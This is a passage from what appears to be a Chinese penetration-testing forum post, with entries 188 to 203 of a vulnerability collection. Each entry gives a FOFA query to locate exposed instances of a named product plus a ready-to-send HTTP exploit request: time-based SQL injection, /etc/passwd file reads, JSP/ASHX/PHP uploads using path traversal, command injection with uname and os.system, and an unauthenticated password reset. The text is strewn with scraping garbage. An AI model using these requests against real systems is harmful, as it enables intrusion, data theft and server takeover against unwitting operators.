( O, Y- \% M* r+ v$ c6 ECVE-2024-32640
+ M- h- ^' s7 R) wFOFA："Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
3 t. O$ u) D3 g- L* \+ k
$ |$ G" O  g! D4 |
2 U7 d/ v: g+ S' V* d& tobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1
: C; @& ?0 q2 G. O$ p0 J' [
5 f% G. U/ a( S, i
4 e- M% W0 z2 M; @7 V188. 叁体-佳会视频会议 attachment 任意文件读取
version <= 3.9.7
FOFA：body="/system/get_rtc_user_defined_info?site_id"
  m' [8 r% y1 ~" E4 aGET /attachment?file=/etc/passwd HTTP/1.1
+ Q: }$ W# E  b. HHost: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
2 X5 g7 a1 S3 e; R' c1 F0 NAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
; U2 n$ |4 S; g) k, ]Accept-Encoding: gzip, deflate
/ a/ x2 a2 v$ U" U6 y; f( w2 p( _Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close
) U- T9 ~- [5 X5 L! H  v4 |8 [5 K
7 p0 ?- Z. b. m$ n
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
7 O5 j7 j7 W% f" h# t* \FOFA：app="LANWON-临床浏览系统"
7 V3 F% z2 G% g* cGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
' G% C* p& z9 E4 WAccept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
6 ]( P: y; d# g, L2 P2 WConnection: close
' y; b( g7 b# O

190. 短视频矩阵营销系统 poihuoqu 任意文件读取
FOFA：title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
3 m) O' D; T& aHost: your-ip
+ ~, M" r! {$ y5 fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
% [6 ^% d8 A% {* eAccept-Encoding: gzip, deflate
8 ~& P9 D4 e6 J, n6 D* cAccept-Language: zh-CN,zh;q=0.9
8 F7 j: y3 _! i; g0 L
poi=file:///etc/passwd
5 J# w+ K5 P8 w% O# X
3 L/ J3 Q5 }$ O$ m0 P* g
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
FOFA：body="/CDGServer3/index.jsp"
( w$ e+ D5 L' ^/ r1 BPOST /CDGServer3/js/../NavigationAjax HTTP/1.1
2 P$ u+ N+ k- m* X; \) [Host: your-ip
( ~7 K. G! p: B9 R8 n1 _7 n9 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
9 _: z7 {3 h" g- jContent-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=
: T9 U. C( q  t1 u7 _

192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
FOFA：title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
8 t  i7 `5 P( Y8 _& BUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded
" }$ b& E: ]: K. `3 m9 M

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
+ L. E- E* P! s  O% |6 |6 p, ?) C- eusing System.Web;
( z/ p$ Z/ K8 epublic class AverageHandler : IHttpHandler
{
public bool IsReusable
+ [' z+ f6 F9 {3 I7 L{ get { return true; } }
. Z* Y8 s( Z" V# t% s. ipublic void ProcessRequest(HttpContext ctx)
{
3 V. y$ e% h; @  [" [6 j( `1 gctx.Response.Write("test");
, G: g' @' a" D}
}

9 x) w5 n# s2 [3 u, P% D
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
; _0 F6 k6 d' |. c+ [3 gFOFA：body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
4 J& |. @) ^* x6 i! C- yContent-Type: application/x-www-form-urlencoded
3 u5 r7 X" J: t  A  _8 X* iUser-Agent: Mozilla/5.0


1 t. g. c6 ~( WPOST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
# o# a, K/ C6 h  H; SHost:
; f6 K, W- X( n) |- f. RUser-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
0 c/ c/ R. v" CCookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

3 K; b7 x! L- U- v9 U  T/ Vparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

9 O. a, _; s# u. w. i
3 r! v7 ]0 p7 Q) y# ~6 KGET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

1 {; p* i  i: H0 `) R
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
FOFA：app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在

- O+ k0 m$ x5 T: L& N; xPOST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
% K2 t; \3 m' ]5 `& w9 _Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
- ^1 k5 T, S: a( ~' ZConnection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk
------WebKitFormBoundaryKNt0t4vBe8cX9rZk

' f" d! U1 J! |+ z$ BContent-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain
( I; H: `) R. a0 Z5 w& F<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"
9 n) D3 O7 j: V5 E# i/ y0 ] {"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

/ k. J) U7 z* v" Q' N
1 C) q+ M% p! u1 l+ G* T195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
FOFA：title=="飞鱼星企业级智能上网行为管理系统
2 e* C$ e( I  D" [, q* t- ^( m( {; |POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
, `- d5 b& Y9 X; JCache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
/ D* \+ ~9 M- v" T; H5 IContent-Length: 68
' q2 o9 b  c) n% d- v
{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

' D% C# B, x% x" K  j
196. 河南省风速科技统一认证平台密码重置
FOFA：body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
* t# E* Z& }1 i) u; TUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
# p6 h: o; j5 D% E* @3 XContent-Type: application/json;charset=UTF-8
& {9 l& C! t8 AX-Requested-With: XMLHttpRequest
( I- h- }- r3 e0 p1 b6 R& h1 _Host:
0 [- ~3 D; ?- z+ jAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
9 J& W6 d5 X5 tContent-Length: 45
( ?/ I- n1 G' h  oConnection: close
! @( k/ S+ y) C$ D  Z
# |' @" o# h# i0 |$ Y{"xgh":"test","newPass":"test666","email":""}
2 b3 V. Q+ x$ w/ |


197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
" w/ x6 Y$ v) _3 q' FFOFA：app="浙大恩特客户资源管理系统"
- O3 X& o, R# W% U, qGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
5 [1 [' Z: W+ C+ w% B) GHost:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close
7 |. Y5 Z2 ?" j$ u, }

, }* `7 z5 V4 G' l
198.  阿里云盘 WebDAV 命令注入
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
2 W: C* a4 L4 x1 ~, a4 `$ b- o- gCookie: sysauth=41273cb2cffef0bb5d0653592624cf64
0 Q0 D+ X* h; C" n3 xAccept: */*
Accept-Encoding: gzip, deflate
* k' ]3 T2 Y( M+ b8 I- L$ fAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close
  s) B/ _' |: o! {6 E! [

199. cockpit系统assetsmanager_upload接口 文件上传

1.执行poc进行csrf信息获取，并获取cookie，再上传访问得到结果：
% p2 l6 k% w# _0 x; pGET /auth/login?to=/ HTTP/1.1

  n6 N4 O: q% D- c- c0 `3 s6 Q6 X响应：200，返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2.使用刚才上一步获取到的jwt获取cookie：

! m3 t2 D0 K% y7 O- w  j9 H3 IPOST /auth/check HTTP/1.1
Content-Type: application/json
, w( _- U. r  E. f! U) g0 e3 _
4 k8 i4 z  I1 l& H6 b0 ?{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

  S+ n0 m! T0 M: o: m! x% w& S! i响应：200，返回值:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/
& T& |2 l8 }+ v( ]6 iFofa：title="Authenticate Please!"
. u2 j2 z5 O, e; W. h  T/ vPOST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
% X5 @+ E6 R5 n" V& yCookie: mysession=95524f01e238bf51bb60d77ede3bea92

1 ]/ c* M, c4 q-----------------------------36D28FBc36bd6feE7Fb3
" U6 q- e4 ]' Y& o) {Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php
1 ]7 ?. o/ i$ b' `, x9 R2 x
<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
, \) J4 e2 ^8 U$ e! Q4 J, v" hContent-Disposition: form-data; name="folder"
. M$ r8 i: [9 I6 q/ l* v  M
5 D9 F- M  H( M4 Z7 P-----------------------------36D28FBc36bd6feE7Fb3--
$ }2 _$ m, u3 {, n- l
/ J9 p' x4 e2 _
# ~  L! y4 g  P% t( a: W/storage/uploads/tttt.php
" y& h# T, k- N, L6 z
$ t2 L: j' ?/ A. T/ c$ T5 ?; F200. SeaCMS海洋影视管理系统dmku SQL注入
FOFA：app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
; M# \7 U2 M  k, VCookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
7 Z) S( j  u* T. K' YCache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
3 u  X; G4 A7 {& i

8 E+ A5 V, O# B  z201. 方正全媒体新闻采编系统 binary SQL注入
4 F- t+ p+ i. n# ?  k( AFOFA：body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
* h6 n" R- r' b3 P; U& C  h# |# IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 q6 `$ M4 g+ y- V: oAccept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
% u! z; S- _% y" G4 F/ v# fConnection: close
! f+ v% q  a6 k" g2 @, Y* \, q
2 I# r, Y: c3 `9 [2 q7 ?TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

2 `" b  C$ }0 C9 Y, n1 o4 z" B
; ~# _: X8 q3 [; g" _- S202. 微擎系统 AccountEdit任意文件上传
  a3 ~" C& [" F$ ~) @FOFA：body="/Widgets/WidgetCollection/"
获取__VIEWSTATE和__EVENTVALIDATION值
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
$ A( C0 S1 M$ {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

  F9 v# f9 u! |+ C0 m1 d2 b1 B
$ R8 V& [- x( H/ r9 E9 q替换__VIEWSTATE和__EVENTVALIDATION值
6 ]) s+ \* C% R' @# \# I7 p9 n! nPOST /User/AccountEdit.aspx HTTP/1.1
) n& L: M4 O- t5 FAccept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687
# Q- s; i+ m7 q) O9 [4 A4 I$ Q- T
: G3 O! U0 u! I4 N; B2 G0 x& n-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"
  K! _# {% Z- s$ O5 }4 Z% }
__EVENTVALIDATION
; H1 `6 ]: G6 m-----------------------------786435874t38587593865736587346567358735687
: y& C  D; G) N+ U$ A* [Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
/ M3 j4 F2 |' l% Y$ B5 o; k: zContent-Type: text/plain
' N: H2 i% M4 e( C
Hello World!
" s4 N- u, Y( r* I* x-----------------------------786435874t38587593865736587346567358735687
9 F8 _+ y& f% m% l/ g' f3 Z) o8 @* cContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

( ?" H& m) T4 ~% W上传图片
-----------------------------786435874t38587593865736587346567358735687
) {, C, e* l  d1 Y1 DContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
( s$ n8 Z8 o1 B: S! x

% X) l' T! R9 r! n: q-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
4 ]/ h) _- f* s# I' Y8 ~  u8 I, D
+ N; g; x, L# M% f
-----------------------------786435874t38587593865736587346567358735687--

1 E. e" A/ K" ~' `+ P. z
3 Q' H+ J3 B& M: p8 n/_data/Uploads/1123.txt
- X) C% P, I% O1 f( T) I
' Z, s/ o5 W) ?) C3 o9 f203. 红海云EHR PtFjk 文件上传
/ J& V- U8 f4 lFOFA：body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ w/ k$ v6 a" e; g8 e, v5 v1 uContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210
% f8 ]5 o6 ?/ ]1 ^! G6 J) u
------WebKitFormBoundaryt7WbDl1tXogoZys4
4 G9 t4 e/ U" O$ tContent-Disposition: form-data; name="fj_file"; filename="11.jsp"
% f7 E/ P4 b5 h1 S% i' WContent-Type:image/jpeg
3 h* K# ]' F! e1 r
<% out.print("hello,eHR");%>
# l! U4 B! i) I+ }5 L5 M' ~------WebKitFormBoundaryt7WbDl1tXogoZys4--

& |- v) Y  |4 \3 @& Z

# u1 b* Q) `) `2 ], @9 t! t- T
2 B! \6 h! {! F' R
- }5 B+ [. |# F# s; q7 a3 @
# \1 ?2 k9 ]7 ]3 G

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2